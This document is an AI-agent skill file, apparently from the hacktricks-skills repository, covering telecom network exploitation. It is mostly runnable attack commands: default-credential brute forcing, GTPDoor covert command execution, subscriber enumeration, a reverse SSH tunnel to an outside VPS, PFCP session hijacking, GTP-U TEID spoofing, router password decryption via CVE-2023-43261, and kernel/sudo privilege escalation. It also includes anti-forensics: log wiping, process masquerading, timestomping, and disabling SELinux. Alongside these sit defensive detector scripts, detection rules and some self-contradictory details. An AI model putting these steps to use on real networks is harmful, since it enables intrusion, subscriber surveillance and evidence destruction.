Hacktricks-skills telecom-network-exploitation

Telecom network security assessment and exploitation techniques for GTP, 5G core, and industrial cellular routers. Use this skill whenever the user mentions telecom networks, mobile core protocols (GTP, PFCP, NAS), 5G security testing, SGSN/GGSN/PGW/AMF/SMF exploitation, industrial cellular routers (Milesight UR-series), GRX/IPX roaming backbones, or any mobile network penetration testing. This skill covers reconnaissance, protocol exploitation, covert channels, privilege escalation on network elements, and detection evasion in telecom environments.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation/SKILL.MD

Source content

Telecom Network Exploitation Skill

A comprehensive guide for security assessments of telecom infrastructure including 4G/5G core networks, GTP protocol exploitation, and industrial cellular router vulnerabilities.

When to Use This Skill

Trigger this skill when the user:

  • Needs to assess telecom network security (GTP, PFCP, NAS protocols)
  • Is testing 5G core network components (AMF, SMF, UPF, MME, SGW, PGW)
  • Wants to exploit or test industrial cellular routers (Milesight UR-series)
  • Is working with GRX/IPX roaming backbones
  • Needs to craft GTP-C/GTP-U packets for testing
  • Is investigating 5G NAS security (SUCI, EEA0/EIA0, replay attacks)
  • Requires PFCP session manipulation techniques
  • Is hunting for telecom-specific attack patterns

Core Concepts

Protocol Stack Overview

| Layer | Protocol | Port | Purpose |
|---|---|---|---|
| Control Plane | GTP-C | UDP 2123 | Session management (PDP context) |
| User Plane | GTP-U | UDP 2152 | User data tunneling |
| 5G Control | PFCP | UDP 8805 | UPF control (N4 interface) |
| 5G NAS | NGAP/NAS | N2 interface | UE registration, authentication |
| Management | HTTP/JSON-RPC | 80/443 | Router web APIs |

Attack Surface Map

┌─────────────────────────────────────────────────────────────┐
│                    TELECOM ATTACK SURFACE                   │
├─────────────────────────────────────────────────────────────┤
│  External → GRX/IPX → Core Network → Data Plane             │
│                                                              │
│  [OSS/NE] → [SGSN/MME] → [GGSN/PGW] → [UPF] → [Internet]   │
│     ↑           ↑           ↑           ↑                   │
│  Default     GTP-C       PFCP        GTP-U                  │
│  Credentials  Exploit    Hijack      TEID Spoof             │
│                                                              │
│  [Industrial Routers] → [SMS API] → [Carrier Network]      │
│       ↑                    ↑                                  │
│  CVE-2023-43261        Unauthenticated                      │
│  (Password Leak)       Query/Inject                          │
└─────────────────────────────────────────────────────────────┘

1. Reconnaissance & Initial Access

1.1 Default Credential Testing

Many vendor network elements ship with hardcoded credentials. Use targeted wordlists:

# Common telecom defaults
root:admin
dbadmin:dbadmin
cacti:cacti
ftpuser:ftpuser
admin:admin

# Brute force with hydra
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://<target> -t 8

Key insight: If the device exposes only a management VRF, pivot through a jump host first before attempting direct access.

1.2 GTP-C Listener Discovery

Map GTP-C services across GRX/IPX backbones:

# Masscan for GTP-C (UDP 2123)
masscan 10.0.0.0/8 -pU:2123 --rate 50000 \
  --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

# Verify with nmap
nmap -sU -p 2123 --script gtp-c-discovery <target>

Note: Most GRX operators still allow ICMP echo across the backbone, enabling host discovery.

2. Subscriber Enumeration

2.1 GTP-C Create PDP Context Probing

Use cordscan to enumerate subscribers and discover the serving SGSN/MME:

# Build the tool
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Query a specific IMSI
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

What it reveals:

  • Current SGSN/MME serving the IMSI
  • Subscriber's visited PLMN
  • Network topology information

2.2 IMSI Format Reference

IMSI: 404 99 5112345678
      │   │  └─ MSIN (Mobile Subscriber Identification Number)
      │   └──── MNC (Mobile Network Code, 2-3 digits; here 99, matching --oper 40499)
      └──────── MCC (Mobile Country Code, 3 digits)

3. Code Execution via GTP

3.1 GTPDoor Concept

GTPDoor is a covert channel that:

  1. Binds UDP 2123 and parses incoming GTP-C packets
  2. Decrypts payloads (AES-128-CBC) when the magic tag is present
  3. Executes commands via /bin/sh -c
  4. Exfiltrates output via Echo Response messages

Why it works: No outward session is created; traffic blends with legitimate GTP-C.

3.2 Crafting GTPDoor Packets

Use the gtp_craft.py script (see scripts/):

# Execute a command via GTPDoor
python3 scripts/gtp_craft.py --type gtpdoor \
  --target 10.10.10.10 \
  --key "SixteenByteKey!" \
  --cmd "id;uname -a"

# Send Create PDP Context probe
python3 scripts/gtp_craft.py --type pdp \
  --imsi 404995112345678 \
  --oper 40499 \
  --target 10.10.10.10

3.3 Detection Signatures

| Indicator | Description |
|---|---|
| Unbalanced Echo Requests | Host sending Echo Requests without receiving Echo Responses |
| GTP Version 1 + Message Type 1 | Deviation from spec (Echo should be version 1, type 1) |
| High-rate GTP-C to non-SGSN | Any device other than SGSN/GGSN creating PDP contexts |
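The first and third signatures in the table, plus the Echo Response exfiltration channel described in 3.1, can be checked mechanically from the fixed GTPv1 header alone. The detector below is an added example written for this page; it is not code from the hacktricks-skills repository or from any tool it names, and it also implements detection rules 1 and 3 from section 12.1. It parses the 8-byte GTPv1 header (3GPP TS 29.060), counts Echo Requests against the Echo Responses each host gets back, flags Create PDP Context Requests from addresses outside the configured SGSN ranges, and flags Echo Responses whose length field is far larger than a Recovery IE needs. The 16-byte threshold, the host addresses and the sample packets are constructed for the example, not 3GPP values.

```python
import ipaddress
from collections import defaultdict

# GTPv1 message types (3GPP TS 29.060)
GTP_ECHO_REQUEST = 1
GTP_ECHO_RESPONSE = 2
GTP_CREATE_PDP_CONTEXT_REQUEST = 16

# A legitimate Echo Response carries little more than a 2-byte Recovery IE; anything
# longer than this is treated as suspicious. Heuristic chosen for the example, not a spec value.
MAX_BENIGN_ECHO_RESPONSE_LEN = 16


def parse_gtpv1_header(data: bytes) -> dict:
    """Decode the mandatory 8-byte GTPv1 header; raise ValueError if it is not GTPv1."""
    if len(data) < 8:
        raise ValueError("short GTP header")
    flags = data[0]
    version = flags >> 5
    if version != 1:
        raise ValueError(f"not GTPv1 (version field {version})")
    return {
        "version": version,
        "protocol_type": (flags >> 4) & 1,           # 1 = GTP, 0 = GTP' (charging)
        "message_type": data[1],
        "length": int.from_bytes(data[2:4], "big"),  # bytes following the 8-byte header
        "teid": int.from_bytes(data[4:8], "big"),
    }


def build_gtpv1(message_type: int, payload: bytes = b"", teid: int = 0, version: int = 1) -> bytes:
    """Assemble a GTPv1 message for the constructed sample traffic below (test data only)."""
    flags = (version << 5) | 0x10  # PT=1, no optional header fields
    return bytes([flags, message_type]) + len(payload).to_bytes(2, "big") + teid.to_bytes(4, "big") + payload


def analyse_gtpc(packets, sgsn_ranges):
    """packets: iterable of (src_ip, dst_ip, udp_payload) observed on UDP 2123.
    sgsn_ranges: CIDR strings of the hosts allowed to create PDP contexts."""
    allowed = [ipaddress.ip_network(n) for n in sgsn_ranges]
    echo_sent = defaultdict(int)      # Echo Requests sent, per host
    echo_received = defaultdict(int)  # Echo Responses received, per host
    rogue_pdp, oversized_echo = set(), set()
    for src, dst, payload in packets:
        try:
            hdr = parse_gtpv1_header(payload)
        except ValueError:
            continue  # not GTPv1: outside the scope of these rules
        mtype = hdr["message_type"]
        if mtype == GTP_ECHO_REQUEST:
            echo_sent[src] += 1
        elif mtype == GTP_ECHO_RESPONSE:
            echo_received[dst] += 1  # the response lands on the original requester
            if hdr["length"] > MAX_BENIGN_ECHO_RESPONSE_LEN:
                oversized_echo.add(src)
        elif mtype == GTP_CREATE_PDP_CONTEXT_REQUEST:
            if not any(ipaddress.ip_address(src) in net for net in allowed):
                rogue_pdp.add(src)
    return {
        "unbalanced_echo_hosts": sorted(h for h, n in echo_sent.items() if n > echo_received[h]),
        "non_sgsn_pdp_sources": sorted(rogue_pdp),
        "oversized_echo_responders": sorted(oversized_echo),
    }


# Constructed sample traffic: an SGSN/GGSN pair exchanging a normal keepalive, plus a
# host that sends unanswered Echo Requests, creates PDP contexts and gets a bloated reply.
SGSN, GGSN, ROGUE = "10.1.1.10", "10.1.2.20", "10.1.1.99"
SAMPLE_PACKETS = [
    (SGSN, GGSN, build_gtpv1(GTP_ECHO_REQUEST)),
    (GGSN, SGSN, build_gtpv1(GTP_ECHO_RESPONSE, b"\x0e\x01")),                 # Recovery IE only
    (SGSN, GGSN, build_gtpv1(GTP_CREATE_PDP_CONTEXT_REQUEST, b"\x00" * 40)),
    (ROGUE, GGSN, build_gtpv1(GTP_ECHO_REQUEST)),
    (ROGUE, GGSN, build_gtpv1(GTP_ECHO_REQUEST)),
    (ROGUE, GGSN, build_gtpv1(GTP_CREATE_PDP_CONTEXT_REQUEST, b"\x00" * 40)),
    (GGSN, ROGUE, build_gtpv1(GTP_ECHO_RESPONSE, b"\x0e\x01" + b"A" * 60)),    # oversized reply
    (ROGUE, GGSN, build_gtpv1(GTP_ECHO_REQUEST, version=2)),                   # skipped: not GTPv1
]

if __name__ == "__main__":
    # 10.1.1.8/29 covers the SGSN (.10) but not the rogue host (.99)
    for rule, hosts in analyse_gtpc(SAMPLE_PACKETS, ["10.1.1.8/29"]).items():
        print(f"{rule}: {hosts}")
```

The per-host counters are deliberately keyed by the requester on both sides (sender of the request, destination of the response), so a host that only ever receives Echo Requests, as a GTPDoor-style listener would, never shows up as unbalanced itself; the rule points at the party that keeps polling it.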

4. Pivoting Through the Core

4.1 SGSN Emulator + SOCKS5

Establish a PDP context tunnel to bypass signaling-only VLANs:

# Start SGSN emulator (requires OsmoGGSN)
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
       -APN internet -c 1 -d

# Add route through tun0
ip route add 172.16.0.0/12 dev tun0

# Start SOCKS proxy
microsocks -p 1080 &

# Use with proxychains
proxychains curl http://internal-service.local

4.2 DNS Tunnel for SSH Reverse

DNS is typically open in roaming infrastructures:

# From compromised host to VPS
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

# VPS must have GatewayPorts enabled in sshd_config

5. Covert Channels

| Channel | Transport | Encoding | Use Case |
|---|---|---|---|
| ICMP EchoBackdoor | ICMP Echo Req/Rep | XOR (4-byte key) | Passive listener, no outbound |
| DNS NoDepDNS | UDP 53 | XOR in A-record | *.nodep subdomain |
| GTP GTPDoor | UDP 2123 | AES-128-CBC | Blends with GTP-C traffic |

Common pattern: All implants implement watchdogs that timestomp binaries and re-spawn if crashed.

6. 5G NAS Security Testing

6.1 Registration Flow Overview

UE → AMF (N2/NGAP)
  ↓
1. Registration Request (SUCI + capabilities)
  ↓
2. Authentication (RAND/AUTN → RES*)
  ↓
3. Security Mode Command/Complete (EEA/EIA negotiation)
  ↓
4. PDU Session Establishment

Critical window: Steps 1-2 are unauthenticated and unencrypted.

6.2 SUCI/IMSI Privacy Testing

Check for plaintext SUPI/IMSI exposure:

# Wireshark filters
ngap.procedure_code == 15  # InitialUEMessage
nas-5gs.message_type == 65  # Registration Request

# Check for SUCI vs IMSI
nas-5gs.mobile_identity.suci  # Should exist
nas-5gs.mobile_identity.imsi  # Should NOT exist (privacy defect)

What to collect: MCC/MNC/MSIN if exposed; track per-UE across time/locations.

6.3 Algorithm Downgrade (EEA0/EIA0)

Test for null algorithm acceptance:

# Using Sni5Gect to patch NAS capabilities
python3 sni5gect.py --hook nas --patch eea0_eia0_only \
  --target 10.10.20.5 --interface eth0

# Verify in Wireshark after Security Mode Command
# Look for: Encryption in use [EEA0]

Mitigation: Configure AMF to reject EEA0/EIA0 except for emergency services.
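Both checks in 6.2 and 6.3 come down to reading two NAS fields. The code below is an added example for this page (not code from the hacktricks-skills repository, Sni5Gect or any other tool named here): it decodes the value part of the 5GS mobile identity IE from TS 24.501 9.11.3.4 and reports whether the SUCI uses the null protection scheme, which is the case where the MSIN travels in clear and a "SUCI" gives no more privacy than an IMSI, and it decodes the selected NAS security algorithms octet from 9.11.3.34 (the page's EEA0/EIA0 are 5G-EA0/5G-IA0 in 5G naming) and applies the mitigation rule stated above: null algorithms are acceptable only for emergency registration. The PLMN, routing indicator and MSIN values are constructed; the builder exists only to produce test input.

```python
# Constants from 3GPP TS 24.501 (5GS mobile identity, selected NAS security algorithms)
TYPE_OF_IDENTITY = {0: "no identity", 1: "SUCI", 2: "5G-GUTI", 3: "IMEI", 4: "5G-S-TMSI", 5: "IMEISV", 6: "MAC address"}
PROTECTION_SCHEME = {0: "null scheme", 1: "ECIES profile A", 2: "ECIES profile B"}
CIPHERING = {0: "5G-EA0 (null)", 1: "128-5G-EA1", 2: "128-5G-EA2", 3: "128-5G-EA3"}
INTEGRITY = {0: "5G-IA0 (null)", 1: "128-5G-IA1", 2: "128-5G-IA2", 3: "128-5G-IA3"}


def bcd_encode(digits: str) -> bytes:
    """Telecom BCD: low nibble first, 0xF pads an odd digit count."""
    out = bytearray()
    for i in range(0, len(digits), 2):
        low = int(digits[i])
        high = int(digits[i + 1]) if i + 1 < len(digits) else 0x0F
        out.append((high << 4) | low)
    return bytes(out)


def bcd_decode(data: bytes) -> str:
    digits = []
    for b in data:
        for nib in (b & 0x0F, b >> 4):
            if nib == 0x0F:
                return "".join(digits)
            digits.append(str(nib))
    return "".join(digits)


def encode_plmn(mcc: str, mnc: str) -> bytes:
    """3-octet PLMN: MCC2|MCC1, MNC3|MCC3, MNC2|MNC1 (MNC3 = 0xF for 2-digit MNCs)."""
    mnc3 = int(mnc[2]) if len(mnc) == 3 else 0x0F
    return bytes([(int(mcc[1]) << 4) | int(mcc[0]), (mnc3 << 4) | int(mcc[2]), (int(mnc[1]) << 4) | int(mnc[0])])


def decode_plmn(b: bytes):
    mcc = f"{b[0] & 0xF}{b[0] >> 4}{b[1] & 0xF}"
    mnc = f"{b[2] & 0xF}{b[2] >> 4}" + ("" if b[1] >> 4 == 0xF else f"{b[1] >> 4}")
    return mcc, mnc


def build_suci(mcc, mnc, routing_indicator, scheme, hn_key_id, scheme_output: bytes) -> bytes:
    """Value part of a 5GS mobile identity IE carrying an IMSI-format SUCI (constructed test data)."""
    first = 0b001  # bits 7-5: SUPI format 000 (IMSI); bits 3-1: type of identity 001 (SUCI)
    ri = bcd_encode(routing_indicator).ljust(2, b"\xff")
    return bytes([first]) + encode_plmn(mcc, mnc) + ri + bytes([scheme & 0x0F, hn_key_id & 0xFF]) + scheme_output


def parse_5gs_mobile_identity(value: bytes) -> dict:
    """Decode the value part (after IEI and length) of a 5GS mobile identity IE.
    plaintext_supi is True when the null protection scheme was used: the MSIN is in clear."""
    if not value:
        raise ValueError("empty identity")
    type_of_id = value[0] & 0x07
    result = {"identity_type": TYPE_OF_IDENTITY.get(type_of_id, f"reserved({type_of_id})"), "plaintext_supi": False}
    if type_of_id != 1:
        return result  # only SUCI carries the privacy question examined here
    supi_format = (value[0] >> 4) & 0x07
    if supi_format != 0:
        result["supi_format"] = "NAI" if supi_format == 1 else f"reserved({supi_format})"
        return result  # NAI-based SUCI is not decoded by this example
    if len(value) < 8:
        raise ValueError("truncated SUCI")
    mcc, mnc = decode_plmn(value[1:4])
    scheme = value[6] & 0x0F
    result.update({
        "supi_format": "IMSI", "mcc": mcc, "mnc": mnc,
        "routing_indicator": bcd_decode(value[4:6]),
        "protection_scheme": PROTECTION_SCHEME.get(scheme, f"reserved({scheme})"),
        "home_network_key_id": value[7],
        "msin": bcd_decode(value[8:]) if scheme == 0 else None,  # scheme output is the bare MSIN only for null scheme
        "plaintext_supi": scheme == 0,
    })
    return result


def check_selected_algorithms(octet: int, emergency: bool = False) -> dict:
    """Selected NAS security algorithms IE: bits 8-5 ciphering, bits 4-1 integrity."""
    ea, ia = (octet >> 4) & 0x0F, octet & 0x0F
    null_used = ea == 0 or ia == 0
    return {
        "ciphering": CIPHERING.get(ea, f"reserved({ea})"),
        "integrity": INTEGRITY.get(ia, f"reserved({ia})"),
        "null_algorithm": null_used,
        "acceptable": (not null_used) or emergency,  # the AMF policy stated in 6.3
    }


if __name__ == "__main__":
    suci = build_suci("404", "99", "0", 0, 0, bcd_encode("5112345678"))  # constructed identity
    print(parse_5gs_mobile_identity(suci))
    print(check_selected_algorithms(0x00), check_selected_algorithms(0x22))
```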

6.4 NAS Replay Testing

Use 5GReplay to test replay protection:

# Capture registration
python3 5greplay.py --capture --output reg_capture.xml

# Replay with rule
python3 5greplay.py --replay reg_capture.xml \
  --rule initial_ue_message_forward.xml

What to observe: Whether AMF accepts replay and proceeds to authentication.

7. Industrial Router Exploitation

7.1 Milesight UR-Series SMS API Abuse

Unauthenticated SMS query/inject on the exposed /cgi endpoint:

# Query outbox (keep the JSON on one line: a backslash inside single quotes is
# sent literally, not treated as a shell line continuation)
curl -sk -X POST http://<router>/cgi \
  -H 'Content-Type: application/json' \
  -d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

# Query inbox
curl -sk -X POST http://<router>/cgi \
  -H 'Content-Type: application/json' \
  -d '{"base":"query_inbox","function":"query_inbox","values":[{"page":1,"per_page":100}]}'

Response fields: timestamp, content, phone_number (E.164), status

7.2 CVE-2023-43261 Password Recovery

Affected: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7)

# Extract encrypted password from logs
curl -sk http://<router>/lang/log/httpd.log | \
  grep -o '"password":"[^"]*"' | head -5

# Decrypt with script
python3 scripts/decrypt_milesight.py --encrypted "<base64_value>"

Key/IV: Hardcoded in client-side JavaScript (KEY=1111111111111111, IV=2222222222222222)

7.3 Detection Patterns

| Pattern | Indicator |
|---|---|
| Unauthenticated /cgi POST | JSON with base/function = query_inbox/query_outbox |
| Capability testing | Repeated POST /cgi with "status":"failed" to many numbers |
| Exposed logs | /lang/log/system or /lang/log/httpd.log accessible |
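The three patterns in the table are easy to run over web-server or reverse-proxy records in front of a router. The hunt below is an added example written for this page, not code from the hacktricks-skills repository or from Milesight. It assumes each record has already been normalised into a dict with client, method, path, status, an authenticated flag (whether a valid session accompanied the request) and the raw request and response bodies; that record shape, the threshold of five distinct numbers, the client addresses and the "PLACEHOLDER_send" base/function name used in the sample are all constructed for the example, since the page does not document the send call. The only field names taken from the page are query_inbox, query_outbox, phone_number, status and the two log paths.

```python
import json
from collections import defaultdict

SMS_QUERY_FUNCTIONS = {"query_inbox", "query_outbox"}
LOG_PATHS = {"/lang/log/system", "/lang/log/httpd.log"}
CAPABILITY_TEST_THRESHOLD = 5  # distinct numbers with failed sends from one client (assumed cut-off)


def _json_or_none(text):
    try:
        return json.loads(text) if text else None
    except ValueError:
        return None


def _find_values(obj, key):
    """Collect every value stored under `key` anywhere in a nested JSON object."""
    found = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k == key:
                found.append(v)
            found.extend(_find_values(v, key))
    elif isinstance(obj, list):
        for item in obj:
            found.extend(_find_values(item, key))
    return found


def hunt_milesight(records):
    """records: dicts with client, method, path, status, authenticated, request_body, response_body.
    Returns one finding per matched pattern: unauth_sms_query, capability_testing, exposed_log."""
    findings = []
    failed_numbers = defaultdict(set)  # client -> numbers whose send came back "failed"
    for r in records:
        method, path = r["method"].upper(), r["path"]
        if method == "POST" and path == "/cgi":
            body = _json_or_none(r.get("request_body", ""))
            resp = _json_or_none(r.get("response_body", ""))
            if not isinstance(body, dict):
                continue
            # Pattern 1: SMS mailbox query without a session
            if {body.get("base"), body.get("function")} & SMS_QUERY_FUNCTIONS and not r.get("authenticated"):
                findings.append({"rule": "unauth_sms_query", "client": r["client"], "detail": body.get("function")})
            # Pattern 2 (first half): remember numbers behind failed sends
            failed = (isinstance(resp, dict) and resp.get("status") == "failed") \
                or '"status":"failed"' in r.get("response_body", "")
            if failed:
                for number in _find_values(body, "phone_number"):
                    failed_numbers[r["client"]].add(str(number))
        elif method == "GET" and path in LOG_PATHS and r.get("status") == 200:
            # Pattern 3: log file served without authentication
            findings.append({"rule": "exposed_log", "client": r["client"], "detail": path})
    # Pattern 2 (second half): many distinct numbers failing from one client
    for client, numbers in failed_numbers.items():
        if len(numbers) >= CAPABILITY_TEST_THRESHOLD:
            findings.append({"rule": "capability_testing", "client": client,
                             "detail": f"{len(numbers)} numbers with failed sends"})
    return findings


def _rec(client, method, path, status, authenticated=False, request_body="", response_body=""):
    return {"client": client, "method": method, "path": path, "status": status,
            "authenticated": authenticated, "request_body": request_body, "response_body": response_body}


# Constructed sample: one logged-in admin query (benign) and one external client that
# reads the inbox without a session, fetches httpd.log and probes six numbers.
SAMPLE_RECORDS = [
    _rec("10.0.0.5", "POST", "/cgi", 200, authenticated=True,
         request_body='{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}',
         response_body='{"status":"ok"}'),
    _rec("198.51.100.7", "POST", "/cgi", 200,
         request_body='{"base":"query_inbox","function":"query_inbox","values":[{"page":1,"per_page":100}]}',
         response_body='{"status":"ok"}'),
    _rec("198.51.100.7", "GET", "/lang/log/httpd.log", 200),
    _rec("198.51.100.7", "GET", "/lang/log/system", 404),  # not served: no finding
] + [
    _rec("198.51.100.7", "POST", "/cgi", 200,
         request_body=json.dumps({"base": "PLACEHOLDER_send", "function": "PLACEHOLDER_send",
                                  "values": [{"phone_number": f"+1555000{i:04d}", "content": "test"}]}),
         response_body='{"status":"failed"}')
    for i in range(6)
]

if __name__ == "__main__":
    for f in hunt_milesight(SAMPLE_RECORDS):
        print(f)
```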

8. PFCP Session Hijacking

8.1 Session Modification Attack

If PFCP is accessible on N4, craft Session Modification Request:

# Use the pfcp_hijack.py script
python3 scripts/pfcp_hijack.py \
  --upf 10.10.20.5 \
  --seid 0x123456789abc \
  --pdr-id 7 \
  --far-id 77 \
  --sink-ip 203.0.113.55 \
  --teid 0xdeadbeef

Mechanism: Insert duplicate PDR with smaller precedence; some UPFs apply first match.

8.2 GTP-U TEID Spoofing

Inject user traffic by spoofing TEIDs:

# Craft GTP-U packet with known TEID
python3 scripts/gtp_craft.py --type gtpu \
  --teid 0x7ffed00 \
  --dst 10.10.20.8 \
  --inner-src 10.0.0.10 \
  --inner-dst 1.1.1.1 \
  --inner-dport 443

Prerequisite: Learn active TEIDs via passive sniffing on N3/N6.

9. SBA/SBI Fuzzing

9.1 Cross-Service Token Attack

Reuse tokens across NF services when audience checks are missing:

# Steal token from one NF, use on another
curl -sk -H "Authorization: Bearer $TOKEN" \
     -H "Host: smf.internal" \
     https://smf.internal/nsmf-pdusession/v1/sm-contexts
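The defect behind this attack is a producer NF that verifies the token signature but never checks that the aud claim names itself. The validator below is an added example for this page, not code from the hacktricks-skills repository, Open5GS or any NRF implementation. It uses the access-token claims from TS 33.501 (iss, sub, aud, scope, exp) and rejects a token minted for another NF; HS256 with a shared secret is a constructed stand-in for the NRF's signing key so the example runs offline (real SBA deployments normally use the NRF's asymmetric key), and the NF names, secret and timestamps are constructed.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims: dict, secret: bytes) -> str:
    """Constructed HS256 issuer standing in for the NRF (test helper, not an NRF API)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def validate_sba_token(token: str, secret: bytes, expected_aud: str, required_scope: str, now=None):
    """Return (accepted, reason). The audience check is what stops cross-service reuse."""
    now = time.time() if now is None else now
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
    except (ValueError, UnicodeDecodeError):
        return False, "malformed token"
    if header.get("alg") != "HS256":
        return False, "unsupported alg"  # never let the token pick the algorithm ('none')
    expected_sig = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected_sig, _b64url_decode(sig_b64)):
        return False, "bad signature"
    if not isinstance(claims.get("exp"), (int, float)) or now >= claims["exp"]:
        return False, "expired"
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    if expected_aud not in audiences:
        return False, f"audience mismatch: token for {aud}, this NF is {expected_aud}"
    if required_scope not in str(claims.get("scope", "")).split():
        return False, "scope mismatch"
    return True, "ok"


if __name__ == "__main__":
    secret = b"constructed-nrf-secret"
    now = 1_700_000_000
    for aud in ("SMF", "UDM"):
        tok = mint_token({"iss": "nrf.internal", "sub": "amf-01", "aud": aud,
                          "scope": "nsmf-pdusession", "exp": now + 600}, secret)
        print(aud, validate_sba_token(tok, secret, "SMF", "nsmf-pdusession", now=now))
```

Detection rule 8 in section 12.1 is the same comparison done out of band: log the aud claim of every bearer token a producer NF receives and alert when it does not match that NF.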

9.2 Automated Fuzzing

Use FivGeeFuzz with derived grammars:

python3 fivgeefuzz.py --nf nsmf-pdusession \
  --target https://smf.internal \
  --grammar grammars/nsmf-pdusession.json \
  --token "$TOKEN" --threads 8 --max-cases 500

Watch for: 401/403 bypasses, crashes in SMF/AMF pods.

10. Defense Evasion

10.1 Log Manipulation

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/<attacker_ip>/d' | \
  utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null
history -c

10.2 Process Hiding

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup
printf '\0' > /proc/$$/comm  # Appears as [kworker/1]

# Timestomp binaries
touch -r /usr/bin/time /path/to/implant

10.3 SELinux Bypass

setenforce 0  # Disable SELinux (requires root)

11. Privilege Escalation on Network Elements

11.1 Common Exploits

| CVE | Target | Command |
|---|---|---|
| CVE-2016-5195 | Linux kernel (DirtyCow) | gcc dirty.c -o dirty && ./dirty /etc/passwd |
| CVE-2021-4034 | polkit (PwnKit) | python3 PwnKit.py |
| CVE-2021-3156 | sudo (Baron Samedit) | python3 exploit_userspec.py |

11.2 Cleanup

userdel <attacker_user> 2>/dev/null
rm -f /tmp/sh
history -c

12. Detection & Hunting

12.1 Network Detection Rules

| # | Detection | Query Pattern |
|---|---|---|
| 1 | Non-SGSN GTP-C | udp.port==2123 and not src.ip in sgsn_range |
| 2 | SSH on non-standard ports | tcp.port in (53,80,443) and tcp.flags.syn==1 and ssh.handshake |
| 3 | GTPDoor beacons | udp.port==2123 and gtp.type==1 and echo_request_count > echo_response_count |
| 4 | ICMP covert channel | icmp.type==0 and icmp.identifier > 0 and icmp.sequence > 0 |
| 5 | 5G NAS replay | ngap.procedure_code==15 and nas.message_type==65 and same_source_ip |
| 6 | Null algorithm negotiation | nas.security_mode and (eea==0 or eia==0) |
| 7 | PFCP hijack | pfcp.msg_type==MODIFICATION and duplicate_pdr_id |
| 8 | Cross-service token | http.authorization.bearer and aud != target_nf |

12.2 Asset Inventory

# Shodan queries for exposed routers
shodan search http.html:"rt_title"  # Milesight panels
shodan search "Milesight" "UR32" "UR35" "UR41"

# Google dorking
google "/lang/log/system" ext:log
google inurl:/cgi "query_outbox"

13. Tool Box

| Tool | Purpose | Source |
|---|---|---|
| cordscan | GTP-C subscriber enumeration | Custom (Go) |
| GTPDoor | Covert GTP command execution | Custom |
| EchoBackdoor | ICMP covert channel | Custom |
| NoDepDNS | DNS covert channel | Custom |
| sgsnemu | SGSN emulator for pivoting | OsmoGGSN |
| 5GReplay | 5G NAS replay testing | Custom |
| Sni5Gect | Live NAS sniff/modify/inject | Custom |
| FivGeeFuzz | SBA/SBI fuzzing | Academic (2025) |
| FScan | Intranet TCP sweeps | Public |
| Responder | LLMNR/NBT-NS rogue WPAD | Public |
| Microsocks | SOCKS5 proxy | Public |
| FRP | NAT traversal | Public (≥0.37) |

14. Lab Setup

14.1 5G Core Testbed

# Open5GS deployment (sufficient for most tests)
docker-compose -f open5gs-compose.yaml up -d

# Components: AMF, SMF, UPF, HSS, PCF
# Interfaces: N1 (UE-AMF), N2 (gNB-AMF), N4 (SMF-UPF)

14.2 Wireshark Display Filters

# NGAP InitialUEMessage
ngap.procedure_code == 15

# NAS Registration Request
nas-5gs.message_type == 65

# GTP-C Create PDP Context Request (message type 16; type 1 is Echo Request)
gtpv1.message_type == 16

# PFCP Session Modification Request (message type 52 in TS 29.244)
pfcp.msg_type == 52

# SUCI vs IMSI
nas-5gs.mobile_identity.suci
nas-5gs.mobile_identity.imsi

15. References

Standards

  • 3GPP TS 29.060 – GPRS Tunnelling Protocol (GTPv1)
  • 3GPP TS 29.281 – GTPv2-C
  • 3GPP TS 24.501 – NAS protocol for 5GS
  • 3GPP TS 33.501 – Security architecture for 5G System

Research & Reports

Vulnerabilities

  • CVE-2016-5195 (DirtyCow)
  • CVE-2021-4034 (PwnKit)
  • CVE-2021-3156 (Baron Samedit)
  • CVE-2023-43261 (Milesight Password Leak)

Usage Notes

  1. Legal compliance: Only use these techniques on networks you own or have explicit authorization to test.

  2. Lab first: Always validate techniques in a controlled lab environment (Open5GS, OAI) before field deployment.

  3. Documentation: Record all findings, including false positives and detection bypasses.

  4. Tool updates: Keep custom tools updated; telecom protocols evolve with 3GPP releases.

  5. Defense perspective: Understanding these attacks helps design better detection rules and hardening measures.